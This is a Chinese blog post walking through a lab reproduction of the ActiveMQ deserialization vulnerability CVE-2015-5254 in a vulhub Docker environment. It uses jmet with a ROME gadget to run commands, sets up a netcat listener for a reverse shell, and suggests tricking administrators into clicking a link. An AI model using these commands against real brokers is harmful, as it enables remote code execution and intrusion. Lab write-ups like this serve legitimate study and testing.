ActiveMQ反序列化漏洞CVE-2015-5254复现

最新推荐文章于 2023-10-26 23:15:40 发布
最新推荐文章于 2023-10-26 23:15:40 发布
阅读量407 收藏 1
点赞数
分类专栏: 漏洞 文章标签: 安全漏洞 渗透测试 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51387754/article/details/118049086
版权

ActiveMQ反序列化漏洞(CVE-2015-5254)复现

漏洞前言

Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。

0x01 漏洞环境

1.在KALI2021.1下

启动docker服务
sudo service docker start

进入某一个漏洞/环境的目录
cd activemq/CVE-2015-5254/
自动化编译环境
docker-compose build

在这里插入图片描述
2.运行漏洞环境:

docker-compose up -d (推荐)或者 docker-compose build ///编译环境启动容器

在这里插入图片描述

环境运行后,将监听61616和8161两个端口其中61616是工作端口,消息在这个端口进行传递; 8161是网络管理页面端口访问http://your-ip:8161即可看到网络管理页面,不过这个漏洞理论上是不需要网络的。
在这里插入图片描述

使用浏览器直接访问activemq,查看是否部署完毕

http://45.32.101.90:8161/admin/(默认的用户名/密码为admin/admin)
在这里插入图片描述
进入后的页面
在这里插入图片描述

0x02 漏洞复现

1.漏洞利用过程如下:

a.构造(可以使用ysoserial)可执行命令的序列化对象

b.作为一个消息,发送给目标61616端口

c.访问的Web管理页面,读取消息,触发漏洞

2.使用jmet进行漏洞利用:

首先下载jmet的jar文件,并在同目录下创建一个external文件夹(否则可能会爆文件夹不存在的错误)。jmet原理是使用ysoserial生成Payload并发送(其jar内自带ysoserial,无需再自己下载),所以我们需要在ysoserial是gadget中选择一个可以使用的,比如ROME。

cd /opt

wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar

mkdir external
在这里插入图片描述

3.执行命令

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y “touch /tmp/sucess” -Yp ROME 192.168.80.131 61616
在这里插入图片描述

4.此时会给目标的ActiveMQ添加一个名为事件的队列,可以我们通过http://192.168.80.131:8161/admin/browse.jsp?JMSDestination=event看到这个队列中所有消息:
在这里插入图片描述

5.点击查看这条消息即可触发命令执行
在这里插入图片描述

6.此时进入容器

(root💀guiltyfet)-[/home/guiltyfet/vulhub/activemq/CVE-2015-5254]
└─# docker-compose exec activemq bash

7.可看到/ tmp /已成功创建,说明漏洞利用成功:


root@4a2960bae35a:/opt/apache-activemq-5.11.1# ls
LICENSE  NOTICE  README.txt  activemq-all-5.11.1.jar  bin  conf  data  docs  examples  lib  tmp  webapps  webapps-demo
root@4a2960bae35a:/opt/apache-activemq-5.11.1#

8.反弹shell:
将命令替换成弹shell语句再利用:

bese64编码

在这里插入图片描述

在这里插入图片描述

以下监听端口无反应

远程主机监听44444端口:

nc -lvvp 44444
在这里插入图片描述

即可看到反弹是shell:

值得注意的是,通过网络管理页面访问消息并触发漏洞这个过程需要管理员权限。在没有密码的情况下,我们可以诱导管理员访问我们的链接以触发,或者伪装成其他合法服务需要的消息,等待客户端访问的时候触发。

关闭镜像(每次用完后关闭)
docker-compose down

docker-compose常用命令

拉镜像(进入到vulhub某个具体目录后)

docker-compose build
docker-compose up -d

镜像查询(查到的第一列就是ID值)

docker ps -a

进入指定镜像里面(根据上一条查出的ID进入)

docker exec -it ID /bin/bash

关闭镜像(每次用完后关闭)

docker-compose down

问题:

(root💀guiltyfet)-[/home/guiltyfet/vulhub/activemq/CVE-2015-5254]
└─# docker-compose down
Removing network cve-2015-5254_default
WARNING: Network cve-2015-5254_default not found.
GuiltyFet
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
Apache activeMQ漏洞
Shanfenglan's blog
12-14 3192
文章目录1. ActiveMQ 序列漏洞CVE-2015-5254)2. ActiveMQ任意文件写入漏洞CVE-2016-3088)2.1 利用参考文章 1. ActiveMQ 序列漏洞CVE-2015-5254) Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列的类。远程攻击者可借助特制的序列的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。 工具下载地址:http
ActiveMQ 序列漏洞(CVE-2015-5254)
weixin_44047654的博客
11-23 469
ActiveMQ 序列漏洞(CVE-2015-5254)
ActiveMQ 序列漏洞 (CVE-2015-5254)
qq_32642035的博客
10-17 1220
ActiveMQ 序列漏洞 (CVE-2015-5254)漏洞
Apache ActiveMQ 远程代码执行漏洞CVE-2016-3088)及排查
dayouzi的博客
08-14 2232
ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。所以,ActiveMQ在5.12.x~5.13.x版本中,已经默认关闭了fileserver这个应用(你可以在conf/jetty.xml中开启之);在5.14.0版本以后,彻底删除了fileserver应用。
【vulhub漏洞CVE-2015-5254 ActiveMQ序列漏洞
RexHa的博客
02-26 1858
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。该漏洞源于程序没有限制可在代理中序列的类。远程攻击者可借助特制的序列的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。
ActiveMQ 信息泄漏漏洞(CVE-2017-15709)
weixin_44047654的博客
11-25 2777
ActiveMQ 信息泄漏漏洞(CVE-2017-15709)
ActiveMQ 序列漏洞CVE-2015-5254)利用工具
08-15
在2015年,ActiveMQ被发存在一个严重的安全漏洞,被称为CVE-2015-5254,这是一个序列漏洞,允许攻击者通过精心构造的恶意消息来执行任意代码,从而对目标系统造成重大威胁。 序列漏洞通常发生在对象从...
ActiveMQ序列漏洞CVE-2015-5254) 漏洞利用工具
11-25
ActiveMQ序列漏洞CVE-2015-5254)漏洞利用工具,说明文档已存在请进行查看
activemq-cpp-library-3.9.5 编译的windows库文件,支持vs2015、vs2017
07-21
总之,ActiveMQ-CPP Library 3.9.5为C++开发者提供了与ActiveMQ交互的便捷方式,结合Visual Studio 2015和2017的支持,能够在Windows平台上高效地构建消息驱动的应用程序。通过理解其核心组件和使用方法,开发者可以...
apache-activemq-5.16.5-bin.tar.gz 下载(5积分)
08-17
Apache ActiveMQ是Apache软件基金会的一个开源项目,是一个基于消息的通信中间件。ActiveMQ是JMS的一个具体实,支持JMS的两种消息模型。ActiveMQ使用AMQP协议集成多平台应用,使用STOMP协议通过websockets在Web...
apache-activemq-5.13.0-bin.tar.gz
08-02
apache-activemq-5.13.0-bin.tar.gz,处理分布式事务
activemq-artemis-dynatrace-plugin:ActiveMQ Artemis经纪人流程的自定义Dynatrace JMX插件
05-03
Dynatrace的ActiveMQ Artemis插件关于经纪人流程的自定义 插件。Artemis概述插件该插件提供常规的代理统计信息,例如地址内存使用率,连接/用户数,总消息数,总消息添加/确认率。 Artemis Queues插件这提供了详细的...
Apache ActiveMQ RCE漏洞CVE-2023-46604)
最新发布
0xSec
10-26 7976
ActiveMQ是一个开源的消息代理和集成模式服务器,它支持Java消息服务(JMS) API。它是Apache Software Foundation下的一个项目,用于实消息中间件,帮助不同的应用程序或系统之间进行通信。Apache ActiveMQ 中存在远程代码执行漏洞,Apache ActiveMQ在默认安装下开放了61616服务端口,而该端口并没有对传入数据进行适当的过滤,从而使攻击者能够构造恶意数据以实远程代码执行。
linux下ActiveMQ5.13 安装与配置
飞翔小猪的博客
10-09 5320
第一步:安装JDK1.7以上环境不会的这个自己百度 然后到官网下载activeMq的安装包 http://activemq.apache.org/download.html apache-activemq-5.13.3-bin.tar.gz 第二步:解压安装包 [root@rdcdz140387 ~]# cd /usr/local/ [root@rdcdz140387 ~]# tar z
ActiveMQ 序列漏洞 (CVE-2015-5254)
qq_45314073的博客
09-16 1481
ActiveMQ 序列漏洞
ActiveMQ系列漏洞汇总
热门推荐
AaronLuo
06-06 1万+
ActiveMQ 序列漏洞CVE-2015-5254) Apache ActiveMQ是美国Apache软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring FrameWork。 Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列的类。远程攻击者可借助特制的序列的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。 信息搜集 nmap -sS -T5 -n
DNS域传送漏洞CVE-2015-5254)
Kevin's Blog
07-16 963
一、漏洞原理   DNS协议支持使用AXFR类型的记录进行区域传送,用来解决主从同步问题,如果管理员在配置DNS服务器的时候没有限制允许获取记录的来源,将会导致DNS域传送漏洞。 (AXFR(完全区域传输),为了为新的服务器添加到网络配置为有区域的新辅助服务器时,进行从主要区域中制和同步所有区域副本,来保证解析名称查询时的可用性和容错。) 二、测试方法 方法一: /# 使用dig命令发送d...
[应用安全]之ActiveMQ漏洞利用方法总结
zhang8907xiaoyue的博客
03-22 7201
Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件;由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。ActiveMQ 是一个完全支持JMS1.1和J2EE 1.4规范的 JMS Provider实,尽管JMS 应用介绍 Apache ActiveMQ是Apache软件基金会所研发的开放源代码
JD-FreeFuck 后台RCE漏洞
weixin_51387754的博客
11-05 8401
漏洞简介 RCE英文全称:remote command/code execute 分为远程命令执行ping和远程代码执行evel。 漏洞的原因:没有在输入口做输入处理。 我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。其实这就是一个接口,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统,这就是RCE漏洞漏洞 fofa语法
ActiveMQ 序列漏洞
08-19
ActiveMQ 序列漏洞是指在使用 ActiveMQ 进行消息传递时,由于未正确验证和过滤用户提交的数据,恶意攻击者可以利用该漏洞在目标系统上执行任意代码。这种漏洞通常是由于未正确配置 ActiveMQ序列序列...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

GuiltyFet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值